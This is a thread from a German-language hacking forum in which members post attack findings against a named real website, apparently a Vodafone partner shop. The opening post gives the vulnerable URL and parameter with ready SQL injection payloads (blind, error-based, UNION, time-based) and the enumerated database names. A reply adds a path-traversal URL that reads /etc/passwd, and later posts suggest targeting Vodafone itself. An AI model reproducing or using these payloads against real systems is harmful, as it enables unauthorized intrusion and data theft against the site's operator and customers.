Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLI] www.vodafone-rostock.de

- - - - -

  • Bitte melde dich an um zu Antworten
3 Antworten in diesem Thema

#1
Osed28

Osed28

    Pentester

  • Elite Member
  • Likes
    110
  • 146 Beiträge
  • 205 Bedankt
  • Spender
  • Android
  • Windows

www.vodafone-rostock.de/index.php?haupfrabrik=vodafone_online_shop&thema=2
 
Parameter: thema (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: haupfrabrik=vodafone_online_shop&thema=-3015 OR (9747=9747)

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: haupfrabrik=vodafone_online_shop&thema=2 AND (SELECT 8705 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT (CASE WHEN (8705=8705) THEN 1 ELSE 0 END)),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: haupfrabrik=vodafone_online_shop&thema=2 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171717671,0x486b5559486b4a4c6b57,0x7178786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: haupfrabrik=vodafone_online_shop&thema=-5018 OR 7766=SLEEP(5)
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] db300161110
[*] information_schema

Cat ^.^ Cat


Thanked by 2 Members:
DirtyGirl , most_uniQue

#2
R3s1stanc3

R3s1stanc3

    Hacktivist

  • Premium Member
  • Likes
    22
  • 72 Beiträge
  • 4 Bedankt
  • 687249355
  • Android [root]
  • Linux

Hab noch eine Arbitrary File Download Lücke gefunden:

http://www.vodafone-rostock.de/download.php?LinkOrdner=../../../../../etc/&file=passwd

Bearbeitet von R3s1stanc3, 31 January 2015 - 22:08 Uhr.


#3
XoiL

XoiL

    Leecher

  • Banned
  • PIP
  • Likes
    2
  • 1 Beiträge
  • 14 Bedankt
  • Android [root], Blackberry
  • Linux

Leider wird da nicht viel auf dem Server sein. Schaut mal was passiert wenn Ihr auf den Shop klickt. Das ist nur ein Vodafone Partner. Die bekommen Ihre Provision fuer Vertraege , duerfen aber server im Prinzieb nichts ;) macht euch also nicht die Muehe.

 

Lg



#4
DR.zydz

DR.zydz

    Altes Haus

  • Elite Member
  • Likes
    234
  • 258 Beiträge
  • 430 Bedankt
  • 631033078
  • Android [root]
  • Windows, Linux

Ein genauer Blick auf Vodafone selbst lohnt dennoch ;)


Dzu5d.jpg

 

DHHC




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 104 user(s)


    , , 2242, abramas, and6578, AnonymES, ASR, b.giuseppe74, B1nary, balti, Banger109, bbxhnr, Becks, BlackZetsu, BobMarley, Bojka, Bot4ng, Bypass, CashFlow, Ch!ller, chick0n, clusterhead, cooky1, Cranky, Crap, crimeez, damager187, desmond, dev-0, DirtyGirl, Dmtr, domiya1337, DR.zydz, easysurfer, FalkE, Foxi, Framerater, frechdax, Freshness28, G0rki, gravel, hackeris, hfnox, Husti_nett, Hydra, igorborisvas, Injection, kadama, kalixa, keyb0ardz, kingkev0, klaudiakuhn, kpakpando, Laggy, lHamzeh, lNobodyl, LtoG, man, MasterJva, mdwd, MegaLOL, mister-miyagi, mogel, most_uniQue, Netwxrk, NoNameMT, Norky, notfound, OBEY, Osed28, p0pc0rn, PaulaAbdul, pdr0, Pentoman, Ph@ntom, PharaonTM, Platin, prto, R3s1stanc3, RainForest, redflag, riki-r0ki, RudolfAntal, SandeL, saske46, SavE1, Schnee, sitb, Slowyy, smc2014, Smokyjoe, SonnyBlack, Streetboz, Syorack, T00LStar, Toolbase, Tortilla, Toskom4n, Unkiii, VeqasZ, VIP3R, w0tan, Xenio, XoiL
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.